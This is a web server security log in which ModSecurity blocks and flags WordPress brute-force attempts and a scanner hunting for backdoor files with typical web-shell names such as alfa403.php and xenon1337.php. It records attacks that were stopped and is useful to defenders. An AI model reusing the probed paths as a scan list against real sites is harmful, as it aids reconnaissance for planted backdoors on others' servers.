[Tue May 26 16:42:02.034327 2026] [security2:error] [pid 817651:tid 817887] [client 20.195.199.65:52292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWAAtlGRCPPN1dS2y2rygAAAO8"]
[Tue May 26 16:42:02.034436 2026] [security2:error] [pid 817651:tid 817887] [client 20.195.199.65:52292] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWAAtlGRCPPN1dS2y2rygAAAO8"]
[Tue May 26 16:42:02.296038 2026] [security2:error] [pid 823496:tid 823642] [client 117.198.37.168:54612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAApa08mrtyBNpA4PFPAAAAA4"]
[Tue May 26 16:42:02.296150 2026] [security2:error] [pid 823496:tid 823642] [client 117.198.37.168:54612] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAApa08mrtyBNpA4PFPAAAAA4"]
[Tue May 26 16:42:02.721665 2026] [security2:error] [pid 817651:tid 817856] [client 165.140.119.146:51203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWAAtlGRCPPN1dS2y2r0AAAANA"], referer: https://www.bloggertarget.com
[Tue May 26 16:42:02.721797 2026] [security2:error] [pid 817651:tid 817856] [client 165.140.119.146:51203] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWAAtlGRCPPN1dS2y2r0AAAANA"], referer: https://www.bloggertarget.com
[Tue May 26 16:42:03.062052 2026] [security2:error] [pid 823496:tid 823663] [client 20.195.199.65:17523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/x.php"] [unique_id "ahWAA5a08mrtyBNpA4PFRQAAACM"]
[Tue May 26 16:42:03.062141 2026] [security2:error] [pid 823496:tid 823663] [client 20.195.199.65:17523] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/x.php"] [unique_id "ahWAA5a08mrtyBNpA4PFRQAAACM"]
[Tue May 26 16:42:03.761368 2026] [security2:error] [pid 817651:tid 817788] [client 20.195.199.65:63477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/201.php"] [unique_id "ahWAA9lGRCPPN1dS2y2r2gAAAIw"]
[Tue May 26 16:42:03.761488 2026] [security2:error] [pid 817651:tid 817788] [client 20.195.199.65:63477] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/201.php"] [unique_id "ahWAA9lGRCPPN1dS2y2r2gAAAIw"]
[Tue May 26 16:42:03.806329 2026] [security2:error] [pid 823496:tid 823670] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAA5a08mrtyBNpA4PFWgAAACo"], referer: https://www.anujtradingco.com/
[Tue May 26 16:42:04.080374 2026] [security2:error] [pid 823496:tid 823738] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAAZa08mrtyBNpA4PFNgAAAG4"]
[Tue May 26 16:42:04.465978 2026] [security2:error] [pid 823496:tid 823728] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWABJa08mrtyBNpA4PFYQAAAGQ"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1513718&moderation-hash=be3232afec1c81fc37d209726442fe49
[Tue May 26 16:42:04.526330 2026] [security2:error] [pid 823496:tid 823646] [client 20.195.199.65:17464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ops.php"] [unique_id "ahWABJa08mrtyBNpA4PFZAAAABI"]
[Tue May 26 16:42:04.526442 2026] [security2:error] [pid 823496:tid 823646] [client 20.195.199.65:17464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/ops.php"] [unique_id "ahWABJa08mrtyBNpA4PFZAAAABI"]
[Tue May 26 16:42:05.207962 2026] [security2:error] [pid 817651:tid 817815] [client 20.195.199.65:17529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/samll.php"] [unique_id "ahWABdlGRCPPN1dS2y2r6QAAAKc"]
[Tue May 26 16:42:05.208058 2026] [security2:error] [pid 817651:tid 817815] [client 20.195.199.65:17529] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/samll.php"] [unique_id "ahWABdlGRCPPN1dS2y2r6QAAAKc"]
[Tue May 26 16:42:05.473606 2026] [security2:error] [pid 817651:tid 817893] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAA9lGRCPPN1dS2y2r1gAAAPU"]
[Tue May 26 16:42:05.944038 2026] [security2:error] [pid 823496:tid 823690] [client 20.195.199.65:54963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ingfo.php"] [unique_id "ahWABZa08mrtyBNpA4PFcAAAAD4"]
[Tue May 26 16:42:05.944192 2026] [security2:error] [pid 823496:tid 823690] [client 20.195.199.65:54963] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/ingfo.php"] [unique_id "ahWABZa08mrtyBNpA4PFcAAAAD4"]
[Tue May 26 16:42:07.131336 2026] [security2:error] [pid 823496:tid 823752] [client 20.195.199.65:31284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/c55cdler.php"] [unique_id "ahWAB5a08mrtyBNpA4PFewAAAHw"]
[Tue May 26 16:42:07.131438 2026] [security2:error] [pid 823496:tid 823752] [client 20.195.199.65:31284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/c55cdler.php"] [unique_id "ahWAB5a08mrtyBNpA4PFewAAAHw"]
[Tue May 26 16:42:07.604843 2026] [security2:error] [pid 823496:tid 823657] [client 62.60.130.233:59074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahWAB5a08mrtyBNpA4PFgQAAAB0"]
[Tue May 26 16:42:07.794745 2026] [security2:error] [pid 817651:tid 817899] [client 20.195.199.65:31577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/error_log.php"] [unique_id "ahWAB9lGRCPPN1dS2y2sBQAAAPs"]
[Tue May 26 16:42:07.794842 2026] [security2:error] [pid 817651:tid 817899] [client 20.195.199.65:31577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/error_log.php"] [unique_id "ahWAB9lGRCPPN1dS2y2sBQAAAPs"]
[Tue May 26 16:42:07.845194 2026] [security2:error] [pid 817651:tid 817793] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWABdlGRCPPN1dS2y2r8wAAAJE"]
[Tue May 26 16:42:07.932400 2026] [security2:error] [pid 823496:tid 823628] [client 62.60.130.233:61231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahWAB5a08mrtyBNpA4PFkwAAAAA"]
[Tue May 26 16:42:08.329473 2026] [security2:error] [pid 823496:tid 823711] [client 20.195.199.65:26031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/xenon1337.php"] [unique_id "ahWACJa08mrtyBNpA4PFmgAAAFM"]
[Tue May 26 16:42:08.329581 2026] [security2:error] [pid 823496:tid 823711] [client 20.195.199.65:26031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/xenon1337.php"] [unique_id "ahWACJa08mrtyBNpA4PFmgAAAFM"]
[Tue May 26 16:42:08.695391 2026] [security2:error] [pid 823496:tid 823635] [client 167.160.74.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWACJa08mrtyBNpA4PFoAAAAAc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:42:09.531910 2026] [security2:error] [pid 823496:tid 823718] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAB5a08mrtyBNpA4PFiQAAAFo"]
[Tue May 26 16:42:09.992346 2026] [security2:error] [pid 823496:tid 823723] [client 20.195.199.65:19454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/alfa403.php"] [unique_id "ahWACZa08mrtyBNpA4PFswAAAF8"]
[Tue May 26 16:42:09.992456 2026] [security2:error] [pid 823496:tid 823723] [client 20.195.199.65:19454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/alfa403.php"] [unique_id "ahWACZa08mrtyBNpA4PFswAAAF8"]
[Tue May 26 16:42:10.525770 2026] [security2:error] [pid 817651:tid 817818] [client 167.160.74.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWACtlGRCPPN1dS2y2sFAAAAKo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1512725&moderation-hash=9cac9426cda284c1689d2fc3f62360c2
[Tue May 26 16:42:10.725249 2026] [security2:error] [pid 817651:tid 817808] [client 20.195.199.65:19434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/test11.php"] [unique_id "ahWACtlGRCPPN1dS2y2sFwAAAKA"]
[Tue May 26 16:42:10.725417 2026] [security2:error] [pid 817651:tid 817808] [client 20.195.199.65:19434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/test11.php"] [unique_id "ahWACtlGRCPPN1dS2y2sFwAAAKA"]
[Tue May 26 16:42:10.729931 2026] [security2:error] [pid 823496:tid 823653] [client 62.60.130.228:49684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWACpa08mrtyBNpA4PFvgAAABk"]
[Tue May 26 16:42:11.069924 2026] [security2:error] [pid 817651:tid 817904] [client 62.60.130.228:62120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWAC9lGRCPPN1dS2y2sGQAAAQA"], referer: https://www.google.com/
[Tue May 26 16:42:11.418003 2026] [security2:error] [pid 823496:tid 823680] [client 20.195.199.65:14322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/koala.php"] [unique_id "ahWAC5a08mrtyBNpA4PFywAAADQ"]
[Tue May 26 16:42:11.418112 2026] [security2:error] [pid 823496:tid 823680] [client 20.195.199.65:14322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/koala.php"] [unique_id "ahWAC5a08mrtyBNpA4PFywAAADQ"]
[Tue May 26 16:42:11.845322 2026] [security2:error] [pid 823496:tid 823640] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWACZa08mrtyBNpA4PFsgAAAAw"]
[Tue May 26 16:42:12.013085 2026] [security2:error] [pid 823496:tid 823635] [client 20.195.199.65:4988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/mac.php"] [unique_id "ahWADJa08mrtyBNpA4PF2AAAAAc"]
[Tue May 26 16:42:12.013195 2026] [security2:error] [pid 823496:tid 823635] [client 20.195.199.65:4988] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/mac.php"] [unique_id "ahWADJa08mrtyBNpA4PF2AAAAAc"]
[Tue May 26 16:42:12.874325 2026] [security2:error] [pid 823496:tid 823637] [client 20.195.199.65:4979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/25d653587fdfd1.php"] [unique_id "ahWADJa08mrtyBNpA4PF6wAAAAk"]
[Tue May 26 16:42:12.874433 2026] [security2:error] [pid 823496:tid 823637] [client 20.195.199.65:4979] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/25d653587fdfd1.php"] [unique_id "ahWADJa08mrtyBNpA4PF6wAAAAk"]
[Tue May 26 16:42:12.933707 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:54937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWADJa08mrtyBNpA4PF6QAAAFU"]
[Tue May 26 16:42:12.933832 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:54937] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWADJa08mrtyBNpA4PF6QAAAFU"]
[Tue May 26 16:42:13.526536 2026] [security2:error] [pid 817651:tid 817854] [client 20.195.199.65:26062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wefile.php"] [unique_id "ahWADdlGRCPPN1dS2y2sKgAAAM4"]
[Tue May 26 16:42:13.526663 2026] [security2:error] [pid 817651:tid 817854] [client 20.195.199.65:26062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wefile.php"] [unique_id "ahWADdlGRCPPN1dS2y2sKgAAAM4"]
[Tue May 26 16:42:13.668982 2026] [security2:error] [pid 823496:tid 823709] [client 62.60.130.228:63770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWADZa08mrtyBNpA4PF8gAAAFE"]
[Tue May 26 16:42:13.933155 2026] [security2:error] [pid 817651:tid 817824] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAC9lGRCPPN1dS2y2sIQAAALA"]
[Tue May 26 16:42:14.163815 2026] [security2:error] [pid 817651:tid 817791] [client 20.195.199.65:29857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/casp3.php"] [unique_id "ahWADtlGRCPPN1dS2y2sNgAAAI8"]
[Tue May 26 16:42:14.163935 2026] [security2:error] [pid 817651:tid 817791] [client 20.195.199.65:29857] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/casp3.php"] [unique_id "ahWADtlGRCPPN1dS2y2sNgAAAI8"]
[Tue May 26 16:42:14.895047 2026] [autoindex:error] [pid 823496:tid 823656] [client 20.195.199.65:26092] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-includes/blocks/post-comments-form/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:14.895802 2026] [security2:error] [pid 823496:tid 823656] [client 20.195.199.65:26092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWADpa08mrtyBNpA4PGAwAAABw"]
[Tue May 26 16:42:15.141116 2026] [autoindex:error] [pid 823496:tid 823691] [client 20.195.199.65:26092] AH01276: Cannot serve directory /home1/cicode9a/public_html/dev/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:42:15.141880 2026] [security2:error] [pid 823496:tid 823691] [client 20.195.199.65:26092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "dev.cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahWAD5a08mrtyBNpA4PGBQAAAD8"]
[Tue May 26 16:42:15.325931 2026] [security2:error] [pid 823496:tid 823744] [client 20.195.199.65:26092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWAD5a08mrtyBNpA4PGCwAAAHQ"]
[Tue May 26 16:42:15.326055 2026] [security2:error] [pid 823496:tid 823744] [client 20.195.199.65:26092] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/wp-admin/css/colour.php"] [unique_id "ahWAD5a08mrtyBNpA4PGCwAAAHQ"]
[Tue May 26 16:42:15.932212 2026] [security2:error] [pid 817651:tid 817903] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWADdlGRCPPN1dS2y2sMAAAAP8"]
[Tue May 26 16:42:16.131577 2026] [security2:error] [pid 823496:tid 823640] [client 20.195.199.65:34723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/half.php"] [unique_id "ahWAEJa08mrtyBNpA4PGGAAAAAw"]
[Tue May 26 16:42:16.131687 2026] [security2:error] [pid 823496:tid 823640] [client 20.195.199.65:34723] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/half.php"] [unique_id "ahWAEJa08mrtyBNpA4PGGAAAAAw"]
[Tue May 26 16:42:17.260404 2026] [security2:error] [pid 817651:tid 817886] [client 20.195.199.65:22745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/2P.php"] [unique_id "ahWAEdlGRCPPN1dS2y2sRgAAAO4"]
[Tue May 26 16:42:17.260541 2026] [security2:error] [pid 817651:tid 817886] [client 20.195.199.65:22745] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dev.cicodev.org"] [uri "/2P.php"] [unique_id "ahWAEdlGRCPPN1dS2y2sRgAAAO4"]
